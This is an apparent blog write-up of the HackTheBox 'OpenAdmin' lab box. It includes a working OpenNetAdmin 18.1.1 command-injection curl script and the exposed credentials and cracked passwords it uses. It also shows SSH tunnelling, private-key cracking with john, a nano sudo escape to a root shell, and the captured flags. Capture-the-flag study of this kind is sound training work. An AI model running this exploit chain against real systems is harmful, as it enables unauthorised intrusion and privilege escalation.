HackTheBox OpenAdmin Writeup

OpenAdmin is a nice and easy box with basic exploitation techniques and a moderate privilege escalation section.

Published on May 20, 2020

Recon

Let’s start off with a basic port enum using nmap, just so we know which services are available.

nmap -A openadmin.htb

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

Upon accessing port 80 we are greeted with a default Apache2 page.

Default Apache2 page.

Surely there must be something else so let’s try and find it.

gobuster dir -u http://openadmin.htb -w /usr/share/wordlists/common.txt

/artwork
/music
/marga
/sierra

All of the paths above lead to random HTML template pages for different websites that didn’t have anything useful, well, aside from /music, which did contain a link pointing to /ona.

Upon accessing the newly discovered path we find ourselves with an OpenNetAdmin application.

After a quick read of the index page we find the app version and see that it’s outdated (and therefore likely prone to known vulnerabilities).

You are NOT on the latest release version.
Your version = v18.1.1

Exploitation

Searching Google for “OpenNetAdmin 18.1.1” exploits leads us to this page; the exploit itself is nothing more than a curl request.

#!/bin/bash

while true; do
 echo -n "www-data@openadmin:~$ "; read cmd
 curl -sd "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "http://openadmin.htb/ona/" | sed -n -e "/BEGIN/,/END/ p" | tail -n2 | head -n1
done

After executing the script we can do some internal poking around; a basic enum leads us to the database settings, which include plaintext credentials.

// /opt/ona/www/local/config/database_settings.inc.php

$ona_contexts=array(
  "DEFAULT" => array("databases" => array(0 =>
      array(
        "db_type" => "mysqli",
        "db_host" => "localhost",
        "db_login" => "ona_sys",
        "db_passwd" => "n1nj4W4rri0R!",
        "db_database" => "ona_default",
        "db_debug" => false,
      ),
    ),
    "description" => "Default data context",
    "context_color" => "#D3DBFF",
  ),
);

The parsed credentials are:

ona_sys
n1nj4W4rri0R!

Next, checking /etc/passwd reveals a user named jimmy, maybe he uses the same password for everything…

User

Since the SSH service is running we could try to log in as jimmy, so let’s give it a shot.

ssh jimmy@openadmin.htb

The credentials found previously work, and we are now SSH’d in.

groups

A quick enum displays our current groups.

jimmy internal

Under /var/www we can find a folder with internal group permissions, time to enum more.

drwxr-xr-x  6 www-data www-data 4096 Nov 22 15:59 html
drwxrwx---  2 jimmy    internal 4096 Nov 23 17:43 internal
lrwxrwxrwx  1 www-data www-data   12 Nov 21 16:07 ona -> /opt/ona/www

After inspecting each and every file within that folder we find something juicy.

// /var/www/internal/index.php

if ($_POST["username"] == "jimmy" && hash("sha512", $_POST["password"]) == "00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1") {
    $_SESSION["username"] = "jimmy";
    header("Location: /main.php");
}

The snippet above says that a POST request with the proper credentials logs us in (obviously). Looking up the SHA-512 hash on this online hash cracking website reveals the user’s password.

00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1
Revealed
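As an added example (not the box’s code nor the writeup’s), this is how the same login check could be written so that a leaked source file does not hand over the password: the credential is stored as a salted, slow password_hash() string in a file outside the web root (the path is hypothetical), the check uses password_verify() instead of comparing a bare SHA-512 digest with a loose ==, and the redirect is followed by an exit.

```php
<?php
// Added example, not the original /var/www/internal/index.php: a hardened
// replacement for the jimmy login check discovered above.
declare(strict_types=1);

session_start();

// Hypothetical path outside the web root. The file holds the output of
// password_hash($plaintext, PASSWORD_DEFAULT) generated once, e.g.:
//   php -r 'echo password_hash("<SET-AT-DEPLOY-TIME>", PASSWORD_DEFAULT), PHP_EOL;'
// bcrypt is salted and deliberately slow, so a leaked digest cannot simply be
// looked up on a hash-cracking site the way the unsalted SHA-512 was.
$storedHash = trim((string) file_get_contents('/etc/internal-app/jimmy.hash'));

$username = (string) ($_POST['username'] ?? '');
$password = (string) ($_POST['password'] ?? '');

// Strict comparison on an explicit string: no "==" type juggling.
$userOk = ($username === 'jimmy');

// password_verify() reads the salt/cost from the stored string and compares
// in constant time. Evaluate it even when the username is wrong so both
// branches take roughly the same time.
$passOk = password_verify($password, $storedHash);

if ($userOk && $passOk) {
    // New session id on login prevents session fixation.
    session_regenerate_id(true);
    $_SESSION['username'] = 'jimmy';
    header('Location: /main.php');
    // Without exit the remainder of the page is still sent along with the
    // redirect, which is how protected content leaks on "redirect-only" checks.
    exit;
}

http_response_code(401);
echo 'Invalid credentials';
```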

The next step is to figure out where this supposed internal page is running. The following command will print out all the ports that are listening for connections.

ss -lt

LISTEN
127.0.0.1:mysql
127.0.0.1:52846

In order to connect to that port we are going to use SSH to create a tunnel for us (since the port is only available internally), forwarding the high port on the remote host to our local machine.

ssh -L 52846:127.0.0.1:52846 jimmy@10.10.10.171

Now we can access it by navigating to http://localhost:52846.

After logging in using the credentials that we just cracked we can grab joanna’s private key, but there’s a catch: it’s encrypted… Fear not, we can always crack the password.

Save the key as id_rsa in your current working directory.

ssh2john id_rsa > hash.txt

Cracking the generated hash is as simple as:

john -w:/usr/share/wordlists/rockyou.txt hash.txt

joanna
bloodninjas

Great, now that we have the key and password we can ssh in as joanna.

ssh joanna@openadmin.htb -i id_rsa

cat ~/user.txt

c9b2cf07d40807e62af62660f0c81b5f

Privilege Escalation

Time to get root! The first command I always run is sudo -l.

Oh, nice… looks like we can run something as sudo.

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

Since nano is a common binary we can check GTFOBins; according to that page we can get a shell as root using:

sudo /bin/nano /opt/priv
^R^X
reset; sh 1>&0 2>&0

Great, it worked!

cat ~/root.txt

2f907ed450b361b2c2bf4e8795d5b561

And that’s it, thanks for reading!

sec, ctf, hackthebox, writeup

Marlos Pomin
Full Stack Developer & Retoucher based in Brazil, also a casual pentester.